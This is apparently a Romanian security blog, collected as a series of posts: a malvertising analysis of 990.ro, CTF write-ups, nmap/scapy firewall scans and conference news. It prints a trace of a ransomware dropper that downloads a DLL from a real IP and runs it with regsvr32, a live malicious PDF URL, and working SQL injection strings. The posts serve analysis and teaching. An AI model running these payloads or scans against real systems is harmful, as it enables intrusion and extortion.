990.ro livreaza malware (continuare)

Prima parte o puteti citi aici .

Dupa analiza trafiiculuui am ajuns la concluzia ca ofertantul de publicitate este (www.trafficrevenue.net).

Una din reclamele acestui ofertant, gazduita si pe 990.ro (http://ads.endoftheinternet.org/ku44/yoxlazgmkoaojme.pdf) contine un fisier pdf. (md5:675ec6a025d50f7dafef3992b46b7d41). Acest fisier contine un script java care are codul obfuscat. O incercare de a decoda codul javascript cu ajutorul (jsunpack-n.py) a condus la erori referitoare la inconsistenta codului java. Cine este interesat poate obtine o copie a acestului PDF.

Ceea ce face  pdf-ul destul de interesant este faptul ca modul in care a fost inserat scriptul  java  il face invizibil la tool-urile create de Didier Stevens.

Aceste tool-uri (pdfid si pdfparser) sunt folosite pentru a identifica continuturi periculoase in documente de tip pdf. Intre timp au fost incorporate si in site-ul de analiza a fisierelor suspicioase virustotal.com.

Pentru a putea sa decodez codul java am folosit site-ul Wepawet care a detectat codul java si l-a de-obfuscat. Dupa cum se poate vedea, scriptul java downloadeaza un fisier dll (wpbt0.dll).

Acest fisier modifica cheia shell din registri, blocheaza functionarea calculatorului si afiseaza apoi un mesaj cerand in limba germana plata unei recompense pentru a putea permite refolosirea calculatorului.

0x1a494bbe	urlmon.URLDownloadToFileA(pCaller=0, szURL=http://62.109.12.153/ku44/isf.php?i=8, lpfnCB=0×0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)	0
0x7c86250d	kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d	kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)

 

Ce se poate face? Cum am spus si in prima parte – firefox cu noscript.

PS. Puteti sa cititi in comentariile de la primul post punctul de vedere al administratorului site-ului 990.ro. Referitor la mesajul sau vreau doar sa subliniez ca este datoria administratorului sa verifice ce ofertanti de publicitate alege. Un simplu search pe google ar fi un inceput bun.

“

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, trafficrevenue.net appeared to function as an intermediary for the infection of 11 site(s) including shareapik.blogspot.com/, americanfootballphotos.com/, watchthewalkingdead.blogspot.com/.”

Congresul CCC Ziua 1

Congresul CCC (Chaos Computer Club) a inceput astazi.  Pentru cei interesati sa urmareasca online talk-urile pot accesa urmatorul link. Sunt talk-uri foarte interesante. Pot recomanda inainte de toate talk-ul referitor la “Datamining for Hackers“. Este o dovada foarte elocventa a rezultatelor ce pot fi obtinute atunci cand gandesti “outside the box”. Tnx Scusi. Exista si un canal pe youtube.

Have fun.

Update:

Prezentare “Black Ops of TCP/IP 2011” este interesanta si se refera in principal la systemul Bitcoin. O alta prezentare interesanta a fost cea referitoare la analiza “programului troian guvernamental”. Poate si datorita faptului ca au fost 2 juristi, un specialist in PR si  un specialist in securitate. Un model viabil pentru procesul de forensic . Din pacate este numai in limba germana. Cine are nevoie de lamuriri, va rog sa ma contactati.

990.ro livreaza malware

Site-ul www.990.ro, unde sunt postate de obicei ultimele seriale care ruleaza in televiziune, livreaza prin intermediul unui ofertant de publicitate malware. O vizita pe acest site a dus prima data  la infectarea calculatorului prin intermediul unui document pdf. Al doilea mi-a instalat pe calculatorul de proba un software care dupa ce a schimbat cheia “Schell” in registri, facandu-mi imposibila accessul la calculator, mi-a oferit posibilitatea de a scapa de soft contra unei sume de bani. Stream-ul de publicitate care contine malware-ul este oferit print intermediul celor de la xtendmedia.com sau trafficrevenue.net. Nu am avut timp sa analizez care dintre ele este, dar singura cale prin care puteti inca vizita site-ul este firefox-ul impreuna cu extensia “NoScript”.

Amanunte vor urma…

 

Wireshark GeoIP plugin

Wireshark are intre timp si un pluggin de GEOip. Ce inseamna asta? Se pot corela foarte usor informatiile de locatie cu adresele de IP pentru o mai buna vizibilitate asupra traficului.

Primul lucru care trebuie verificat este daca versiunea instalata a fost compilata cu suport de GeoIP. Informatia se poate afla daca se acceseaza meniul Help -> About Wireshark. La sectiune de compilare se afla pluggin-urile cu care a fost compilat.

Daca GeoIP-ul este unul dintre ele, pasul urmator este sa faci download la baza de date cu informatiile GeoIP de aici. Documentatia originala de instalare cat si cateva exemple de filtre bazate pe informatiile GeoIP se gasesc aici.

Pentru a putea vizualiza informatiile accesati meniul Statistics -> Endpoints -> IPv4 tab. O sa aveti o surpriza apasand obtiunea de Map. Dar mai bine va las pe voi sa o descoperiti.

BTW exista si pluggin de SNORT pentru Wireshark (WireShnork). Mai multe info aici

Have Fun

Cursuri online la Standford

Astazi am citit despre faptul ca universitatea Standford organiseaza cursuri online. Si m-am decis sa vad cum functioneaza si daca merita. Asa ca m-am inscris la cursul de Criptografie. Cursurile incep la 1 Ianuarie. Sigur o sa incerc sa-l fac si pe cel de algoritmi pentru ca cred ca nu mi-ar strica sa-mi aduc aminte ce am invatat acum ceva timp. Oricum in programa sunt si cursuri de “Entrepreneurship” si “Computer Science”.

Have fun

Scan cu source port 0

Ascultand un podcast, am auzit de o veche problema de securitate a unor Firewall-uri care permiteau access nelimitat setand portul sursa 0. Cum se poate verifica in practica?
Nmap:
nmap -sS -p80 –source-port 0 192.168.178.1
sau:
scapy:
>>ans,unans = sr(IP(dst=”192.168.178.1″)/TCP(sport=0,dport=80),n timeout=0.1)
>>ans.summary()

Si pentru ca scapy + python rock, se poate scana si asa :
>>ans,unans = sr(IP(dst=”192.168.178.1″)/TCP(sport=[0,53],dport=80), timeout=0.1)
>>ans.summary()

Have Fun.

Nu amesteca publicitatea cu securitatea

Ieri am primit un mail de la ING care avea intentia sa ma educe in domeniul de phishing. Un mesaj cu un continut profesionist care l-as putea recomanda chiar multor banci.  Dar daca te uiti putin mai mult la mesaj vezi ca adresa de mail, de unde ai putea obtine informatii mai multe (contact@ing.ro), continuta in mesaj este de fapt un link catre site-ul loializare.com.

http://www.loializare.com/clients/wlm/trks.php?C=1&mi=48242&list_id=1606&u=451859&te=ZmFja3lvdTR0cmFja21lQGtpY2thc3MuY29t

Intr-un fel sau altul “deschideti de fiecare data site-ul prin introducerea adresei (nu utilizati linkuri trimise prin email)” nu se potriveste cu afirmatia de mai sus.

Un alt aspect important este ca header-ele mesajului de email arata foarte clar ca mesajul vine de la un server de e-mail din domeniul mai sus mentionat.

Received: from loializare.com (loializare.com. [89.234.14.226])

Domeniul mai sus mentionat apartine unei agentii de publicitate specializata in campanii de e-mail.
Nu vreau sa ma refer acum la faptul ca daca modific parametrul u din linkul de mai sus, dau peste o campanie a firmei e-mag. Ceea ce vreau sa subliniez este ca acest mesaj nu imi ofera nici un element de siguranta care sa ma faca sa cred ca vine de la ING. Pentru mine este numai o culegere de sfaturi bune impotriva phishing-ului care de fapt ar putea sa fie chiar maine transformat intr-un mesaj de phishing. (e-homebank.ro in loc de homebank.ro)?

Domnilor va rog sa va decideti daca vreti sa faceti marketing sau vreti sa faceti o campanie de informare in privinta securitatii
Amandoua in acelasi mesaj nu se potrivesc.

.

BSides London Hacking Challange How To (PDF Challlange)

Organizatorii conferintei BSides London au pus la cale 3 hacking challange-uri, a caror rezolvare ar duce la castigarea unor premii constand in carti. Unul dintre aceste challange-uri este creat de Didier Stevens, care este recunoscut si pentru efortul lui de a creea tool-uri care sa ajute la analiza atacurilor care folosesc ca vector de propagare documentele in format PDF/Office.

Pentru analiza acestui document am folosit PDFSteamdumper care este un tool foarte bun pentru aceste tipuri de analize. O vizualizare a documentului arata urmatorul code java cat si alte informatii necesare:

<<

/Title (BSidesLondon 2011 PDF Challenge)
/Author (Didier Stevens)
/CreationDate (20110421111705)
>>

var j=”;
j += String.fromCharCode(10);
j += String.fromCharCode(118);
j += String.fromCharCode(97);

…….

j += String.fromCharCode(41);
j += String.fromCharCode(59);
j += String.fromCharCode(10);
eval(j);

Tot PDFSteamDumper este in stare sa ruleze codul java “ascuns” si sa-l  extraga.

Versiunea finala arata cam asa:

var a = [2, 3, 1, 1];
var b = [2, 5, 131, 2347];
var c, d;
var e = Math.floor(this.info.CreationDate);
var f = e;
for (c = 0; c < a.length; c++)
for (d = 0; d < a[c]; d++)
f = f / b[c];
if (130817 == f)
app.alert({cMsg: ‘The provided code is correct, your answer is: ‘ + e / b[2] / b[3], cTitle: ‘BSidesLondon 2011 PDF Challenge’, nIcon: 3});
else
app.alert({cMsg: ‘The provided code is wrong!’, cTitle: ‘BSidesLondon 2011 PDF Challenge’, nIcon: 3});

Codul foloseste data creearii documentului pentru a determina daca esti sau nu castigator. Concurentiii trebuie sa modifice aceasta data pentru a putea sa rezolve challange-ul. Mai departe, folosind principiul de clasa a doua conform caruia inmultirea este operatia complementara impartirii, se poate afla data necesara pentru a putea rezolva challange-ul.

Frumos nu? Ce alte tool-uri ati fi folosit pentru a rezolva acest challange?

Cat de interesati sunteti de challange-uri de IT Security?

AppSec Europe 2ed Challange How To

Acum 2 zile a fost facut public al doilea exercitiu CTF (Capture the Flag) de catre OWASP avand ca premiu bilete de intrare la conferinta AppSec din Irlanda. Cum trebuia reolvat acest exercitiu? Exercitiul contine mai multe vulnerabilitati care combinate pot fi folosite la rezolvarea puzzle-ului.

Enuntul este foarte simplu. Trebuie ca participantul sa  rezolve jocul si sa apara pe tabela de score cu “0″ incercari. Numele participantului trebuie sa fie rezultatul concatenarii numelui propriu si al celui mai slab jucator.

Exercitiul se poate rezolva foarte usor cu firefox si extensia “Tamper Data”. Dupa rezolvarea jocului, aplicatia trimite ca parametru ascuns numarul de incercari. Interceptand request-ul se poate modifica aceast numar cu “0″. Pentru aflarea numelui celui mai slab jucator se foloseste o alta vulnerabilitate. “SQL Code Injection” in pagina jotto4.php care contine functionalitatea de search. Doar prin introducere urmatorului string “‘ union select @@version, null,null,null from results #” se poate obtine verisiunea serverului de MySQL. Pentru obtinerea celui mai slab jucator se poate folosi “‘ union select concat(user,count),null,null,null from results #”

Mult succes celor care vor sa se mai joace cu aplicatia. Atentie insa pentru ca pagina contine intre timp persistent cross site scripting. Ne auzim pe urmatorul 21 la urmatorul CTF.

Ce s-a intamplat la HBGary?

Am reusit sa gasesc cateva articole interesante despre cazul “HBGary”.  A devenit rasunator nu datorita gradului ridicat de sofisticare a atacului ci mai ales a faptului ca o firma de securitate ignora voit principiile pe care le “vinde” clientilor. Dotorita arogantei?  Va recomand sa cititi cu atentie istoria intregului incident impreuna cu dreptul la replica a celor de la Anonymous.

Istoria Incidentului

Dreptul la replica

CCC-ul s-a terminat.

si presentarile sau marea majoritate a lor se pot gasi aici. Va recomand sa nu sariti peste conferinta de deschidere tinuta de Rop Gonggrijp. Merita….Din ceea ce e postat …ce v-a placut cel mai mult?

De inceput de an…

Acum ceva timp am relatat despre atacut impotriva sistemului de autentificare PIN/Card, descoperit de cativa  cercetori de la universitatea Cambridge condusi de Ross Anderson. Acum cateva zile insa am descoperit pe site-ul lui, raspunsul la o scrisoare a Asociatiei Britanice a cardurilor care cerea scoaterea de pe site-ul universitatii a studiului in cauza. Mi-a placut foarte mult raspunsul lui care suna cam asa.

Cambridge is the University of Erasmus, of Newton, and of Darwin; censoring writings that offend the powerful is offensive to our deepest values.

Frumos spus…si la multi ani si voua.

Social Engineering la Defcon.

Defcon-ul este cunoscut ca fiind una dintre cele mai vizitate si apreciate conferinte de securitate IT. La editia 18 din acest an tema principala a concursului CTF (Capture the Flag) este Social Engineering-ul. Lansat initial pe site-ul social-engineer.org concursul are ca scop obtinerea a cat mai multe informatii despre o companie asignata fiecarui participant. Cu toate ca are un regulament clar care nu permite adunarea de informatii confidentiale, parole sau informatii financiare multe companii se arata ingrijorate de posibilele implicatii asupra imaginii in cazul in care ar fi target-ul unor astfel de atacuri. Interesanta este si proba in sine. Candidatii trebuie sa obtina cat mai multe informatii pe parcursul unei convorbiri de 20 de minute. Cam ce s-ar putea afla in cazul cand telefonul ar suna la voi la companie?

Have fun anyway…

TED si Yochai Benkler

TED pentru cei care nu stiu, este o initiativa minunata de a aduna oameni cu idei exceptionale .
Una din prezentarile care mi-au placut cel mai mult in domeniul de tehnologie, este cea a lui Yochai Benkler. Plina de pasiune, plina de adevar, plina de esenta si realism despre miscare open source.
Seat back and enjoy here.

Metadatele

NSI a facut public un document care trateaza “sterilizarea-sanitized”  ) informatiilor suplimentare continute in metadatele de documentele Word in momentul in care sunt convertite in formatul PDF. Microsoft s-a ocupat de aceasta tema si a pus si el la dispozitie informatii despre stergerea metadatelor. Ceea ce face documentul de la NSI interesant,  este faptul ca trateaza conversia la PDF si ca este scris in asa fel incat poate fi folosit pentru educarea utilizatorilor.. Pana la urma constientizarea de catre utilizatori a pericolului este primul pas. Documentul poate fi citit aici.

Can you read Metadatas. )

Database encryption: NeverEnding story.

Caut de mult o analiza a posibilelor solutii de mitigare a riscului ca administratorul bazei de data poate vedea datele/exporta datele de bussines. Am gasit acum o presentare a lui Ralph Durkee care a fost prezentata la una din conferintele OWASP. Solutia care se detaseaza ca fiind cea mai practica si care acopera cele mai multe risk-uri este criptarea unor coloane din baza de data folosind pachete standard DBMS_Crypto cu stocare chei simetrice in layerul de aplicatie, in afara bazei de date. O implicatia majora este nevoia de clasifica datele ce trebuiesc sa fie criptate si ca toate aplicatiile care acceseaza datele trebuiesc rescrise. Link-ul catre presentare aici.

Have fun…

Google Picasa si …

 

Navigind pe Picasa , citeodata un simplu back in browser-ul IE8  duce la …..

Cistigator printre certificarile…

..in domeniul de securitate IT pare sa fie Certified Ethical Hacker. Intr-un comunicat de presa Departamentul de Aparare (DoD) al SUA a anuntat aprobarea oficiala a programului de certificare CEH ca baza de pornire in pregatirea personalui apartinind Departementului de Aparare.  Deci se pare ca cei de la CISSP trebuie sa vina cu ceva pentru a putea mentine interesul oamenilor pentru aceasta certificare. Cu siguranta contractele in domeniul securitatii vor incepe sa ceara certificarile cerute de cei de la DoD. Azi in America, miine in toata lumea. Are cineva ambele certificari si poate face o comparatie intre ele?

Combinatia cip si pin este istorie

Cercetatorii de la Universitatea Cambridge, condusi de Ross Anderson,  au descoperit o noua problema de design a sistemului de autorizare a tranzactiilor cu ajutorul cip-ului si  a pin-urilor. Comunicatia dintre un card cu cip si un terminal se face printr-un protocol neautentificat, care informeaza terminalul ca autorizarea se poate face cu cip si pin, cu ajutorul semnaturii sau niciuna. Dar daca autorizarea s-ar face cu cip si semnatura? Cazul in care cardul ar transmite terminalului ca autorizarea se face pe baza de cip si semnatura, atunci banca crede ca autorizarea se face cu pin, si cip-ul ca se face prin intermediul semnaturii. Este inspaimantator, pentru ca in acest caz hotii de carduri nu au nevoie sa mai cunoasca pin-ul pentru a autoriza tranzactii. El trebuie doar sa pacaleasca terminalu si atunci poate introduce orice pin.

Aici un reportaj BBC despre cit e de usor, si articolul original poate fi citit  aici cit si comentariile despre lui Bruce Schneier.

Aveti grija cu cardurile pierdute.

Verified by Visa and Mastercard SecureCode

Verified by Visa si Mastercard SecureCode au fost obiectul analizei unui grup de cercetatori de la Universitatea Cambridge. Postul initial semnat de unul din autori Ross Anderson si mai multe reflectii asupra studiului se pot gasi aici. Aceasta analiza a vulnerabilitatilor de design, a acestor sisteme de autentificare, a atras multe reactii si discutii printre care cea mai notabila este  acea a celor de la RSA, urmata apoi de raspunsul autorilor. Intreaga dezbatere este o frumoasa lectie de concepte de securitate. Merita citit pe  blogului lui Bogdan Manolea, postul si comentariile referitoare la acest studiu recent.

Have fun.

Btw. Ati trimis flori la inmormantarea lui IE6? Microsoft-ul a facut-o. Citeva poze de la inmormintare se gasesc aici. lol

Have fun